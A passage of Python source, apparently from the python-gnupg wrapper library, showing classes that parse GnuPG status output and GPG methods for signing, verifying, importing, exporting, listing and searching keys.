"TRUST_MARGINAL" : TRUST_MARGINAL,
"TRUST_FULLY" : TRUST_FULLY,
"TRUST_ULTIMATE" : TRUST_ULTIMATE,
}
# for now, just the most common error codes. This can be expanded as and
# when reports come in of other errors.
GPG_SYSTEM_ERROR_CODES = {
1: 'permission denied',
35: 'file exists',
81: 'file not found',
97: 'not a directory',
}
GPG_ERROR_CODES = {
11: 'incorrect passphrase',
}
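# Worked example of the FAILURE handling further below (illustrative): a status
# value ending in 32849 (0x8051) has the system-error bit (0x8000) set, so the
# low 15 bits give 81, which maps to 'file not found' in GPG_SYSTEM_ERROR_CODES.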
def __init__(self, gpg):
self.gpg = gpg
self.valid = False
self.fingerprint = self.creation_date = self.timestamp = None
self.signature_id = self.key_id = None
self.username = None
self.key_id = None
self.key_status = None
self.status = None
self.pubkey_fingerprint = None
self.expire_timestamp = None
self.sig_timestamp = None
self.trust_text = None
self.trust_level = None
def __nonzero__(self):
return self.valid
__bool__ = __nonzero__
def handle_status(self, key, value):
if key in self.TRUST_LEVELS:
self.trust_text = key
self.trust_level = self.TRUST_LEVELS[key]
elif key in ("WARNING", "ERROR"):
logger.warning('potential problem: %s: %s', key, value)
elif key == "BADSIG": # pragma: no cover
self.valid = False
self.status = 'signature bad'
self.key_id, self.username = value.split(None, 1)
elif key == "ERRSIG": # pragma: no cover
self.valid = False
(self.key_id,
algo, hash_algo,
cls,
self.timestamp) = value.split()[:5]
self.status = 'signature error'
elif key == "EXPSIG": # pragma: no cover
self.valid = False
self.status = 'signature expired'
self.key_id, self.username = value.split(None, 1)
elif key == "GOODSIG":
self.valid = True
self.status = 'signature good'
self.key_id, self.username = value.split(None, 1)
elif key == "VALIDSIG":
(self.fingerprint,
self.creation_date,
self.sig_timestamp,
self.expire_timestamp) = value.split()[:4]
# may be different if signature is made with a subkey
self.pubkey_fingerprint = value.split()[-1]
self.status = 'signature valid'
elif key == "SIG_ID":
(self.signature_id,
self.creation_date, self.timestamp) = value.split()
elif key == "DECRYPTION_FAILED": # pragma: no cover
self.valid = False
self.key_id = value
self.status = 'decryption failed'
elif key == "NO_PUBKEY": # pragma: no cover
self.valid = False
self.key_id = value
self.status = 'no public key'
elif key in ("EXPKEYSIG", "REVKEYSIG"): # pragma: no cover
# signed with expired or revoked key
self.valid = False
self.key_id = value.split()[0]
if key == "EXPKEYSIG":
self.key_status = 'signing key has expired'
else:
self.key_status = 'signing key was revoked'
self.status = self.key_status
elif key in ("UNEXPECTED", "FAILURE"): # pragma: no cover
self.valid = False
self.key_id = value
if key == "UNEXPECTED":
self.status = 'unexpected data'
else:
# N.B. there might be other reasons. For example, if an output
# file can't be created - /dev/null/foo will lead to a
# "not a directory" error, but which is not sent as a status
# message with the [GNUPG:] prefix. Similarly if you try to
# write to "/etc/foo" as a non-root user, a "permission denied"
# error will be sent as a non-status message.
message = 'error - %s' % value
parts = value.split()
if parts[-1].isdigit():
code = int(parts[-1])
system_error = bool(code & 0x8000)
code = code & 0x7FFF
if system_error:
mapping = self.GPG_SYSTEM_ERROR_CODES
else:
mapping = self.GPG_ERROR_CODES
if code in mapping:
message = mapping[code]
if not self.status:
self.status = message
elif key in ("DECRYPTION_INFO", "PLAINTEXT", "PLAINTEXT_LENGTH",
"NO_SECKEY", "BEGIN_SIGNING"):
pass
else: # pragma: no cover
logger.debug('message ignored: %s, %s', key, value)
class ImportResult(object):
"Handle status messages for --import"
counts = '''count no_user_id imported imported_rsa unchanged
n_uids n_subk n_sigs n_revoc sec_read sec_imported
sec_dups not_imported'''.split()
def __init__(self, gpg):
self.gpg = gpg
self.imported = []
self.results = []
self.fingerprints = []
for result in self.counts:
setattr(self, result, None)
def __nonzero__(self):
if self.not_imported: return False
if not self.fingerprints: return False
return True
__bool__ = __nonzero__
ok_reason = {
'0': 'Not actually changed',
'1': 'Entirely new key',
'2': 'New user IDs',
'4': 'New signatures',
'8': 'New subkeys',
'16': 'Contains private key',
}
problem_reason = {
'0': 'No specific reason given',
'1': 'Invalid Certificate',
'2': 'Issuer Certificate missing',
'3': 'Certificate Chain too long',
'4': 'Error storing certificate',
}
def handle_status(self, key, value):
if key in ("WARNING", "ERROR"):
logger.warning('potential problem: %s: %s', key, value)
elif key in ("IMPORTED", "KEY_CONSIDERED"):
# this duplicates info we already see in import_ok & import_problem
pass
elif key == "NODATA": # pragma: no cover
self.results.append({'fingerprint': None,
'problem': '0', 'text': 'No valid data found'})
elif key == "IMPORT_OK":
reason, fingerprint = value.split()
reasons = []
for code, text in list(self.ok_reason.items()):
if int(reason) | int(code) == int(reason):
reasons.append(text)
reasontext = '\n'.join(reasons) + "\n"
self.results.append({'fingerprint': fingerprint,
'ok': reason, 'text': reasontext})
self.fingerprints.append(fingerprint)
elif key == "IMPORT_PROBLEM": # pragma: no cover
try:
reason, fingerprint = value.split()
except:
reason = value
fingerprint = '<unknown>'
self.results.append({'fingerprint': fingerprint,
'problem': reason, 'text': self.problem_reason[reason]})
elif key == "IMPORT_RES":
import_res = value.split()
for i, count in enumerate(self.counts):
setattr(self, count, int(import_res[i]))
elif key == "KEYEXPIRED": # pragma: no cover
self.results.append({'fingerprint': None,
'problem': '0', 'text': 'Key expired'})
elif key == "SIGEXPIRED": # pragma: no cover
self.results.append({'fingerprint': None,
'problem': '0', 'text': 'Signature expired'})
elif key == "FAILURE": # pragma: no cover
self.results.append({'fingerprint': None,
'problem': '0', 'text': 'Other failure'})
else: # pragma: no cover
logger.debug('message ignored: %s, %s', key, value)
def summary(self):
l = []
l.append('%d imported' % self.imported)
if self.not_imported: # pragma: no cover
l.append('%d not imported' % self.not_imported)
return ', '.join(l)
ESCAPE_PATTERN = re.compile(r'\\x([0-9a-f][0-9a-f])', re.I)
BASIC_ESCAPES = {
r'\n': '\n',
r'\r': '\r',
r'\f': '\f',
r'\v': '\v',
r'\b': '\b',
r'\0': '\0',
}
class SendResult(object):
def __init__(self, gpg):
self.gpg = gpg
def handle_status(self, key, value):
logger.debug('SendResult: %s: %s', key, value)
def _set_fields(target, fieldnames, args):
for i, var in enumerate(fieldnames):
if i < len(args):
target[var] = args[i]
else:
target[var] = 'unavailable'
class SearchKeys(list):
''' Handle status messages for --search-keys.
Handle pub and uid (relating the latter to the former).
Don't care about the rest
'''
UID_INDEX = 1
FIELDS = 'type keyid algo length date expires'.split()
def __init__(self, gpg):
self.gpg = gpg
self.curkey = None
self.fingerprints = []
self.uids = []
def get_fields(self, args):
result = {}
_set_fields(result, self.FIELDS, args)
result['uids'] = []
result['sigs'] = []
return result
def pub(self, args):
self.curkey = curkey = self.get_fields(args)
self.append(curkey)
def uid(self, args):
uid = args[self.UID_INDEX]
uid = ESCAPE_PATTERN.sub(lambda m: chr(int(m.group(1), 16)), uid)
for k, v in BASIC_ESCAPES.items():
uid = uid.replace(k, v)
self.curkey['uids'].append(uid)
self.uids.append(uid)
def handle_status(self, key, value): # pragma: no cover
pass
class ListKeys(SearchKeys):
''' Handle status messages for --list-keys, --list-sigs.
Handle pub and uid (relating the latter to the former).
Don't care about (info from src/DETAILS):
crt = X.509 certificate
crs = X.509 certificate and private key available
uat = user attribute (same as user id except for field 10).
sig = signature
rev = revocation signature
pkd = public key data (special field format, see below)
grp = reserved for gpgsm
rvk = revocation key
'''
UID_INDEX = 9
FIELDS = 'type trust length algo keyid date expires dummy ownertrust uid sig cap issuer flag token hash curve compliance updated origin'.split()
def __init__(self, gpg):
super(ListKeys, self).__init__(gpg)
self.in_subkey = False
self.key_map = {}
def key(self, args):
self.curkey = curkey = self.get_fields(args)
if curkey['uid']:
curkey['uids'].append(curkey['uid'])
del curkey['uid']
curkey['subkeys'] = []
self.append(curkey)
self.in_subkey = False
pub = sec = key
def fpr(self, args):
fp = args[9]
if fp in self.key_map: # pragma: no cover
raise ValueError('Unexpected fingerprint collision: %s' % fp)
if not self.in_subkey:
self.curkey['fingerprint'] = fp
self.fingerprints.append(fp)
self.key_map[fp] = self.curkey
else:
self.curkey['subkeys'][-1].append(fp)
self.key_map[fp] = self.curkey
def _collect_subkey_info(self, curkey, args):
info_map = curkey.setdefault('subkey_info', {})
info = {}
_set_fields(info, self.FIELDS, args)
info_map[args[4]] = info
def sub(self, args):
# See issue #81. We create a dict with more information about
# subkeys, but for backward compatibility reason, have to add it in
# as a separate entry 'subkey_info'
subkey = [args[4], args[11]] # keyid, type
self.curkey['subkeys'].append(subkey)
self._collect_subkey_info(self.curkey, args)
self.in_subkey = True
def ssb(self, args):
subkey = [args[4], None] # keyid, type
self.curkey['subkeys'].append(subkey)
self._collect_subkey_info(self.curkey, args)
self.in_subkey = True
def sig(self, args):
# keyid, uid, sigclass
self.curkey['sigs'].append((args[4], args[9], args[10]))
class ScanKeys(ListKeys):
''' Handle status messages for --with-fingerprint.'''
def sub(self, args):
# --with-fingerprint --with-colons somehow outputs fewer colons,
# use the last value args[-1] instead of args[11]
subkey = [args[4], args[-1]]
self.curkey['subkeys'].append(subkey)
self._collect_subkey_info(self.curkey, args)
self.in_subkey = True
class TextHandler(object):
def _as_text(self):
return self.data.decode(self.gpg.encoding, self.gpg.decode_errors)
if _py3k:
__str__ = _as_text
else:
__unicode__ = _as_text
def __str__(self):
return self.data
class Crypt(Verify, TextHandler):
"Handle status messages for --encrypt and --decrypt"
def __init__(self, gpg):
Verify.__init__(self, gpg)
self.data = ''
self.ok = False
self.status = ''
self.key_id = None
def __nonzero__(self):
if self.ok: return True
return False
__bool__ = __nonzero__
def handle_status(self, key, value):
if key in ("WARNING", "ERROR"):
logger.warning('potential problem: %s: %s', key, value)
elif key == "NODATA":
self.status = "no data was provided"
elif key in ("NEED_PASSPHRASE", "BAD_PASSPHRASE", "GOOD_PASSPHRASE",
"MISSING_PASSPHRASE", "DECRYPTION_FAILED",
"KEY_NOT_CREATED", "NEED_PASSPHRASE_PIN"):
self.status = key.replace("_", " ").lower()
elif key == "NEED_PASSPHRASE_SYM":
self.status = 'need symmetric passphrase'
elif key == "BEGIN_DECRYPTION":
self.status = 'decryption incomplete'
elif key == "BEGIN_ENCRYPTION":
self.status = 'encryption incomplete'
elif key == "DECRYPTION_OKAY":
self.status = 'decryption ok'
self.ok = True
elif key == "END_ENCRYPTION":
self.status = 'encryption ok'
self.ok = True
elif key == "INV_RECP": # pragma: no cover
self.status = 'invalid recipient'
elif key == "KEYEXPIRED": # pragma: no cover
self.status = 'key expired'
elif key == "SIG_CREATED": # pragma: no cover
self.status = 'sig created'
elif key == "SIGEXPIRED": # pragma: no cover
self.status = 'sig expired'
elif key == "ENC_TO": # pragma: no cover
# ENC_TO <long_keyid> <keytype> <keylength>
self.key_id = value.split(' ', 1)[0]
elif key in ("USERID_HINT", "GOODMDC",
"END_DECRYPTION", "CARDCTRL", "BADMDC",
"SC_OP_FAILURE", "SC_OP_SUCCESS",
"PINENTRY_LAUNCHED", "KEY_CONSIDERED"):
pass
else:
Verify.handle_status(self, key, value)
class GenKey(object):
"Handle status messages for --gen-key"
def __init__(self, gpg):
self.gpg = gpg
self.type = None
self.fingerprint = None
def __nonzero__(self):
if self.fingerprint: return True
return False
__bool__ = __nonzero__
def __str__(self):
return self.fingerprint or ''
def handle_status(self, key, value):
if key in ("WARNING", "ERROR"): # pragma: no cover
logger.warning('potential problem: %s: %s', key, value)
elif key == "KEY_CREATED":
(self.type,self.fingerprint) = value.split()
elif key in ("PROGRESS", "GOOD_PASSPHRASE", "KEY_NOT_CREATED"):
pass
else: # pragma: no cover
logger.debug('message ignored: %s, %s', key, value)
class ExportResult(GenKey):
"""Handle status messages for --export[-secret-key].
For now, just use an existing class to base it on - if needed, we
can override handle_status for more specific message handling.
"""
def handle_status(self, key, value):
if key in ("EXPORTED", "EXPORT_RES"):
pass
else:
super(ExportResult, self).handle_status(key, value)
class DeleteResult(object):
"Handle status messages for --delete-key and --delete-secret-key"
def __init__(self, gpg):
self.gpg = gpg
self.status = 'ok'
def __str__(self):
return self.status
problem_reason = {
'1': 'No such key',
'2': 'Must delete secret key first',
'3': 'Ambiguous specification',
}
def handle_status(self, key, value):
if key == "DELETE_PROBLEM": # pragma: no cover
self.status = self.problem_reason.get(value,
"Unknown error: %r" % value)
else: # pragma: no cover
logger.debug('message ignored: %s, %s', key, value)
def __nonzero__(self):
return self.status == 'ok'
__bool__ = __nonzero__
class Sign(TextHandler):
"Handle status messages for --sign"
def __init__(self, gpg):
self.gpg = gpg
self.type = None
self.hash_algo = None
self.fingerprint = None
self.status = None
self.key_id = None
self.username = None
def __nonzero__(self):
return self.fingerprint is not None
__bool__ = __nonzero__
def handle_status(self, key, value):
if key in ("WARNING", "ERROR", "FAILURE"): # pragma: no cover
logger.warning('potential problem: %s: %s', key, value)
elif key in ("KEYEXPIRED", "SIGEXPIRED"): # pragma: no cover
self.status = 'key expired'
elif key == "KEYREVOKED": # pragma: no cover
self.status = 'key revoked'
elif key == "SIG_CREATED":
(self.type,
algo, self.hash_algo, cls, self.timestamp, self.fingerprint
) = value.split()
self.status = 'signature created'
elif key == "USERID_HINT": # pragma: no cover
self.key_id, self.username = value.split(' ', 1)
elif key == "BAD_PASSPHRASE":
self.status = 'bad passphrase'
elif key in ("NEED_PASSPHRASE", "GOOD_PASSPHRASE", "BEGIN_SIGNING"):
pass
else: # pragma: no cover
logger.debug('message ignored: %s, %s', key, value)
VERSION_RE = re.compile(r'gpg \(GnuPG(?:/MacGPG2)?\) (\d+(\.\d+)*)'.encode('ascii'), re.I)
HEX_DIGITS_RE = re.compile(r'[0-9a-f]+$', re.I)
class GPG(object):
decode_errors = 'strict'
result_map = {
'crypt': Crypt,
'delete': DeleteResult,
'generate': GenKey,
'import': ImportResult,
'send': SendResult,
'list': ListKeys,
'scan': ScanKeys,
'search': SearchKeys,
'sign': Sign,
'verify': Verify,
'export': ExportResult,
}
"Encapsulate access to the gpg executable"
def __init__(self, gpgbinary='gpg', gnupghome=None, verbose=False,
use_agent=False, keyring=None, options=None,
secret_keyring=None):
"""Initialize a GPG process wrapper. Options are:
gpgbinary -- full pathname for GPG binary.
gnupghome -- full pathname to where we can find the public and
private keyrings. Default is whatever gpg defaults to.
keyring -- name of alternative keyring file to use, or list of such
keyrings. If specified, the default keyring is not used.
options -- a list of additional options to pass to the GPG binary.
secret_keyring -- name of alternative secret keyring file to use, or
list of such keyrings.
"""
self.gpgbinary = gpgbinary
self.gnupghome = gnupghome
if keyring:
# Allow passing a string or another iterable. Make it uniformly
# a list of keyring filenames
if isinstance(keyring, string_types):
keyring = [keyring]
self.keyring = keyring
if secret_keyring:
# Allow passing a string or another iterable. Make it uniformly
# a list of keyring filenames
if isinstance(secret_keyring, string_types):
secret_keyring = [secret_keyring]
self.secret_keyring = secret_keyring
self.verbose = verbose
self.use_agent = use_agent
if isinstance(options, str): # pragma: no cover
options = [options]
self.options = options
self.on_data = None # or a callable - will be called with data chunks
# Changed in 0.3.7 to use Latin-1 encoding rather than
# locale.getpreferredencoding falling back to sys.stdin.encoding
# falling back to utf-8, because gpg itself uses latin-1 as the default
# encoding.
self.encoding = 'latin-1'
if gnupghome and not os.path.isdir(self.gnupghome):
os.makedirs(self.gnupghome,0x1C0)
try:
p = self._open_subprocess(["--version"])
except OSError:
msg = 'Unable to run gpg (%s) - it may not be available.' % self.gpgbinary
logger.exception(msg)
raise OSError(msg)
result = self.result_map['verify'](self) # any result will do for this
self._collect_output(p, result, stdin=p.stdin)
if p.returncode != 0: # pragma: no cover
raise ValueError("Error invoking gpg: %s: %s" % (p.returncode,
result.stderr))
m = VERSION_RE.match(result.data)
if not m: # pragma: no cover
self.version = None
else:
dot = '.'.encode('ascii')
self.version = tuple([int(s) for s in m.groups()[0].split(dot)])
def make_args(self, args, passphrase):
"""
Make a list of command line elements for GPG. The value of ``args``
will be appended. The ``passphrase`` argument needs to be True if
a passphrase will be sent to GPG, else False.
"""
cmd = [self.gpgbinary, '--status-fd', '2', '--no-tty', '--no-verbose']
if 'DEBUG_IPC' in os.environ:
cmd.extend(['--debug', 'ipc'])
if passphrase and hasattr(self, 'version'):
if self.version >= (2, 1):
cmd[1:1] = ['--pinentry-mode', 'loopback']
cmd.extend(['--fixed-list-mode', '--batch', '--with-colons'])
if self.gnupghome:
cmd.extend(['--homedir', no_quote(self.gnupghome)])
if self.keyring:
cmd.append('--no-default-keyring')
for fn in self.keyring:
cmd.extend(['--keyring', no_quote(fn)])
if self.secret_keyring:
for fn in self.secret_keyring:
cmd.extend(['--secret-keyring', no_quote(fn)])
if passphrase:
cmd.extend(['--passphrase-fd', '0'])
if self.use_agent: # pragma: no cover
cmd.append('--use-agent')
if self.options:
cmd.extend(self.options)
cmd.extend(args)
return cmd
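# Illustrative result (assuming defaults: no keyrings, options or passphrase,
# and no gnupghome): make_args(['--list-keys'], False) yields roughly
#   ['gpg', '--status-fd', '2', '--no-tty', '--no-verbose',
#    '--fixed-list-mode', '--batch', '--with-colons', '--list-keys']
# with '--homedir <gnupghome>' inserted when a home directory was given.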
def _open_subprocess(self, args, passphrase=False):
# Internal method: open a pipe to a GPG subprocess and return
# the file objects for communicating with it.
# def debug_print(cmd):
# result = []
# for c in cmd:
# if ' ' not in c:
# result.append(c)
# else:
# if '"' not in c:
# result.append('"%s"' % c)
# elif "'" not in c:
# result.append("'%s'" % c)
# else:
# result.append(c) # give up
# return ' '.join(cmd)
from subprocess import list2cmdline as debug_print
cmd = self.make_args(args, passphrase)
if self.verbose: # pragma: no cover
print(debug_print(cmd))
if not STARTUPINFO:
si = None
else: # pragma: no cover
si = STARTUPINFO()
si.dwFlags = STARTF_USESHOWWINDOW
si.wShowWindow = SW_HIDE
result = Popen(cmd, shell=False, stdin=PIPE, stdout=PIPE, stderr=PIPE,
startupinfo=si)
logger.debug("%s: %s", result.pid, debug_print(cmd))
return result
def _read_response(self, stream, result):
# Internal method: reads all the stderr output from GPG, taking notice
# only of lines that begin with the magic [GNUPG:] prefix.
#
# Calls methods on the response object for each valid token found,
# with the arg being the remainder of the status line.
lines = []
while True:
line = stream.readline()
if len(line) == 0:
break
lines.append(line)
line = line.rstrip()
if self.verbose: # pragma: no cover
print(line)
logger.debug("%s", line)
if line[0:9] == '[GNUPG:] ':
# Chop off the prefix
line = line[9:]
L = line.split(None, 1)
keyword = L[0]
if len(L) > 1:
value = L[1]
else:
value = ""
result.handle_status(keyword, value)
result.stderr = ''.join(lines)
def _read_data(self, stream, result, on_data=None):
# Read the contents of the file from GPG's stdout
chunks = []
while True:
data = stream.read(1024)
if len(data) == 0:
break
logger.debug("chunk: %r" % data[:256])
chunks.append(data)
if on_data:
on_data(data)
if _py3k:
# Join using b'' or '', as appropriate
result.data = type(data)().join(chunks)
else:
result.data = ''.join(chunks)
def _collect_output(self, process, result, writer=None, stdin=None):
"""
Drain the subprocesses output streams, writing the collected output
to the result. If a writer thread (writing to the subprocess) is given,
make sure it's joined before returning. If a stdin stream is given,
close it before returning.
"""
stderr = codecs.getreader(self.encoding)(process.stderr)
rr = threading.Thread(target=self._read_response, args=(stderr, result))
rr.setDaemon(True)
logger.debug('stderr reader: %r', rr)
rr.start()
stdout = process.stdout
dr = threading.Thread(target=self._read_data, args=(stdout, result, self.on_data))
dr.setDaemon(True)
logger.debug('stdout reader: %r', dr)
dr.start()
dr.join()
rr.join()
if writer is not None:
writer.join()
process.wait()
if stdin is not None:
try:
stdin.close()
except IOError: # pragma: no cover
pass
stderr.close()
stdout.close()
def _handle_io(self, args, fileobj, result, passphrase=None, binary=False):
"Handle a call to GPG - pass input data, collect output data"
# Handle a basic data call - pass data to GPG, handle the output
# including status information. Garbage In, Garbage Out :)
p = self._open_subprocess(args, passphrase is not None)
if not binary: # pragma: no cover
stdin = codecs.getwriter(self.encoding)(p.stdin)
else:
stdin = p.stdin
if passphrase:
_write_passphrase(stdin, passphrase, self.encoding)
writer = _threaded_copy_data(fileobj, stdin)
self._collect_output(p, result, writer, stdin)
return result
#
# SIGNATURE METHODS
#
def sign(self, message, **kwargs):
"""sign message"""
f = _make_binary_stream(message, self.encoding)
result = self.sign_file(f, **kwargs)
f.close()
return result
def set_output_without_confirmation(self, args, output):
"If writing to a file which exists, avoid a confirmation message."
if os.path.exists(output):
# We need to avoid an overwrite confirmation message
args.extend(['--yes'])
args.extend(['--output', no_quote(output)])
def sign_file(self, file, keyid=None, passphrase=None, clearsign=True,
detach=False, binary=False, output=None, extra_args=None):
"""sign file"""
logger.debug("sign_file: %s", file)
if binary: # pragma: no cover
args = ['-s']
else:
args = ['-sa']
# You can't specify detach-sign and clearsign together: gpg ignores
# the detach-sign in that case.
if detach:
args.append("--detach-sign")
elif clearsign:
args.append("--clearsign")
if keyid:
args.extend(['--default-key', no_quote(keyid)])
if output: # write the output to a file with the specified name
self.set_output_without_confirmation(args, output)
if extra_args:
args.extend(extra_args)
result = self.result_map['sign'](self)
#We could use _handle_io here except for the fact that if the
#passphrase is bad, gpg bails and you can't write the message.
p = self._open_subprocess(args, passphrase is not None)
try:
stdin = p.stdin
if passphrase:
_write_passphrase(stdin, passphrase, self.encoding)
writer = _threaded_copy_data(file, stdin)
except IOError: # pragma: no cover
logging.exception("error writing message")
writer = None
self._collect_output(p, result, writer, stdin)
return result
def verify(self, data, **kwargs):
"""Verify the signature on the contents of the string 'data'
>>> GPGBINARY = os.environ.get('GPGBINARY', 'gpg')
>>> gpg = GPG(gpgbinary=GPGBINARY, gnupghome="keys")
>>> input = gpg.gen_key_input(passphrase='foo')
>>> key = gpg.gen_key(input)
>>> assert key
>>> sig = gpg.sign('hello',keyid=key.fingerprint,passphrase='bar')
>>> assert not sig
>>> sig = gpg.sign('hello',keyid=key.fingerprint,passphrase='foo')
>>> assert sig
>>> verify = gpg.verify(sig.data)
>>> assert verify
"""
f = _make_binary_stream(data, self.encoding)
result = self.verify_file(f, **kwargs)
f.close()
return result
def verify_file(self, file, data_filename=None, close_file=True, extra_args=None):
"Verify the signature on the contents of the file-like object 'file'"
logger.debug('verify_file: %r, %r', file, data_filename)
result = self.result_map['verify'](self)
args = ['--verify']
if extra_args:
args.extend(extra_args)
if data_filename is None:
self._handle_io(args, file, result, binary=True)
else:
logger.debug('Handling detached verification')
import tempfile
fd, fn = tempfile.mkstemp(prefix='pygpg')
s = file.read()
if close_file:
file.close()
logger.debug('Wrote to temp file: %r', s)
os.write(fd, s)
os.close(fd)
args.append(no_quote(fn))
args.append(no_quote(data_filename))
try:
p = self._open_subprocess(args)
self._collect_output(p, result, stdin=p.stdin)
finally:
os.unlink(fn)
return result
def verify_data(self, sig_filename, data, extra_args=None):
"Verify the signature in sig_filename against data in memory"
logger.debug('verify_data: %r, %r ...', sig_filename, data[:16])
result = self.result_map['verify'](self)
args = ['--verify']
if extra_args:
args.extend(extra_args)
args.extend([no_quote(sig_filename), '-'])
stream = _make_memory_stream(data)
self._handle_io(args, stream, result, binary=True)
return result
#
# KEY MANAGEMENT
#
def import_keys(self, key_data):
"""
Import the key_data into our keyring.
"""
result = self.result_map['import'](self)
logger.debug('import_keys: %r', key_data[:256])
data = _make_binary_stream(key_data, self.encoding)
self._handle_io(['--import'], data, result, binary=True)
logger.debug('import_keys result: %r', result.__dict__)
data.close()
return result
def recv_keys(self, keyserver, *keyids):
"""Import a key from a keyserver
>>> import shutil
>>> shutil.rmtree("keys", ignore_errors=True)
>>> GPGBINARY = os.environ.get('GPGBINARY', 'gpg')
>>> gpg = GPG(gpgbinary=GPGBINARY, gnupghome="keys")
>>> os.chmod('keys', 0x1C0)
>>> result = gpg.recv_keys('pgp.mit.edu', '92905378')
>>> assert result
"""
result = self.result_map['import'](self)
logger.debug('recv_keys: %r', keyids)
data = _make_binary_stream("", self.encoding)
#data = ""
args = ['--keyserver', no_quote(keyserver), '--recv-keys']
args.extend([no_quote(k) for k in keyids])
self._handle_io(args, data, result, binary=True)
logger.debug('recv_keys result: %r', result.__dict__)
data.close()
return result
def send_keys(self, keyserver, *keyids):
"""Send a key to a keyserver.
Note: it's not practical to test this function without sending
arbitrary data to live keyservers.
"""
result = self.result_map['send'](self)
logger.debug('send_keys: %r', keyids)
data = _make_binary_stream('', self.encoding)
#data = ""
args = ['--keyserver', no_quote(keyserver), '--send-keys']
args.extend([no_quote(k) for k in keyids])
self._handle_io(args, data, result, binary=True)
logger.debug('send_keys result: %r', result.__dict__)
data.close()
return result
def delete_keys(self, fingerprints, secret=False, passphrase=None,
expect_passphrase=True):
"""
Delete the indicated keys.
Since GnuPG 2.1, you can't delete secret keys without providing a
passphrase. However, if you're expecting the passphrase to go to gpg
via pinentry, you should specify expect_passphrase=False. (It's only
checked for GnuPG >= 2.1).
"""
which='key'
if secret: # pragma: no cover
if (self.version >= (2, 1) and passphrase is None and
expect_passphrase):
raise ValueError('For GnuPG >= 2.1, deleting secret keys '
'needs a passphrase to be provided')
which='secret-key'
if _is_sequence(fingerprints): # pragma: no cover
fingerprints = [no_quote(s) for s in fingerprints]
else:
fingerprints = [no_quote(fingerprints)]
args = ['--delete-%s' % which]
args.extend(fingerprints)
result = self.result_map['delete'](self)
if not secret or self.version < (2, 1):
p = self._open_subprocess(args)
self._collect_output(p, result, stdin=p.stdin)
else:
# Need to send in a passphrase.
f = _make_binary_stream('', self.encoding)
try:
self._handle_io(args, f, result, passphrase=passphrase,
binary=True)
finally:
f.close()
return result
def export_keys(self, keyids, secret=False, armor=True, minimal=False,
passphrase=None, expect_passphrase=True):
"""
Export the indicated keys. A 'keyid' is anything gpg accepts.
Since GnuPG 2.1, you can't export secret keys without providing a
passphrase. However, if you're expecting the passphrase to go to gpg
via pinentry, you should specify expect_passphrase=False. (It's only
checked for GnuPG >= 2.1).
"""
which=''
if secret:
which='-secret-key'
if (self.version >= (2, 1) and passphrase is None and
expect_passphrase):
raise ValueError('For GnuPG >= 2.1, exporting secret keys '
'needs a passphrase to be provided')
if _is_sequence(keyids):
keyids = [no_quote(k) for k in keyids]
else:
keyids = [no_quote(keyids)]
args = ['--export%s' % which]
if armor:
args.append('--armor')
if minimal: # pragma: no cover
args.extend(['--export-options','export-minimal'])
args.extend(keyids)
# gpg --export produces no status-fd output; stdout will be
# empty in case of failure
#stdout, stderr = p.communicate()
result = self.result_map['export'](self)
if not secret or self.version < (2, 1):
p = self._open_subprocess(args)
self._collect_output(p, result, stdin=p.stdin)
else:
# Need to send in a passphrase.
f = _make_binary_stream('', self.encoding)
try:
self._handle_io(args, f, result, passphrase=passphrase,
binary=True)
finally:
f.close()
logger.debug('export_keys result: %r', result.data)
# Issue #49: Return bytes if armor not specified, else text
result = result.data
if armor:
result = result.decode(self.encoding, self.decode_errors)
return result
def _get_list_output(self, p, kind):
# Get the response information
result = self.result_map[kind](self)
self._collect_output(p, result, stdin=p.stdin)
lines = result.data.decode(self.encoding,
self.decode_errors).splitlines()
valid_keywords = 'pub uid sec fpr sub ssb sig'.split()
for line in lines:
if self.verbose: # pragma: no cover
print(line)
logger.debug("line: %r", line.rstrip())
if not line: # pragma: no cover
break
L = line.strip().split(':')
if not L: # pragma: no cover
continue
keyword = L[0]
if keyword in valid_keywords:
getattr(result, keyword)(L)
return result
def list_keys(self, secret=False, keys=None, sigs=False):
""" list the keys currently in the keyring
>>> import shutil
>>> shutil.rmtree("keys", ignore_errors=True)
>>> GPGBINARY = os.environ.get('GPGBINARY', 'gpg')
>>> gpg = GPG(gpgbinary=GPGBINARY, gnupghome="keys")
>>> input = gpg.gen_key_input(passphrase='foo')
>>> result = gpg.gen_key(input)
>>> fp1 = result.fingerprint
>>> result = gpg.gen_key(input)
>>> fp2 = result.fingerprint
>>> pubkeys = gpg.list_keys()
>>> assert fp1 in pubkeys.fingerprints
>>> assert fp2 in pubkeys.fingerprints
"""
if sigs:
which = 'sigs'
else: which='keys'
if secret:
which='secret-keys'
args = ['--list-%s' % which,
'--fingerprint', '--fingerprint'] # get subkey FPs, too
if keys:
if isinstance(keys, string_types):
keys = [keys]
args.extend(keys)
p = self._open_subprocess(args)
return self._get_list_output(p, 'list')
def scan_keys(self, filename):
"""
List details of an ascii armored or binary key file
without first importing it to the local keyring.
The function achieves this on modern GnuPG by running:
$ gpg --dry-run --import-options import-show --import
On older versions, it does the *much* riskier:
$ gpg --with-fingerprint --with-colons filename
"""
if self.version >= (2, 1):
args = ['--dry-run', '--import-options', 'import-show', '--import']
else:
logger.warning('Trying to list packets, but if the file is not a '
'keyring, might accidentally decrypt')
args = ['--with-fingerprint', '--with-colons', '--fixed-list-mode']
args.append(no_quote(filename))
p = self._open_subprocess(args)
return self._get_list_output(p, 'scan')
def search_keys(self, query, keyserver='pgp.mit.edu'):
""" search keyserver by query (using --search-keys option)
>>> import shutil
>>> shutil.rmtree('keys', ignore_errors=True)
>>> GPGBINARY = os.environ.get('GPGBINARY', 'gpg')
>>> gpg = GPG(gpgbinary=GPGBINARY, gnupghome='keys')
>>> os.chmod('keys', 0x1C0)
>>> result = gpg.search_keys('<vinay_sajip@hotmail.com>')
>>> assert result, 'Failed using default keyserver'
>>> #keyserver = 'keyserver.ubuntu.com'
>>> #result = gpg.search_keys('<vinay_sajip@hotmail.com>', keyserver)
>>> #assert result, 'Failed using keyserver.ubuntu.com'
"""
query = query.strip()
if HEX_DIGITS_RE.match(query):
query = '0x' + query
args = ['--fingerprint',
'--keyserver', no_quote(keyserver), '--search-keys',
no_quote(query)]
p = self._open_subprocess(args)
# Get the response information
result = self.result_map['search'](self)
self._collect_output(p, result, stdin=p.stdin)
lines = result.data.decode(self.encoding,
self.decode_errors).splitlines()
valid_keywords = ['pub', 'uid']
for line in lines:
if self.verbose: # pragma: no cover
print(line)
logger.debug('line: %r', line.rstrip())
if not line: # sometimes get blank lines on Windows
continue
L = line.strip().split(':')
if not L: # pragma: no cover
continue
keyword = L[0]
if keyword in valid_keywords:
getattr(result, keyword)(L)
return result
def gen_key(self, input):
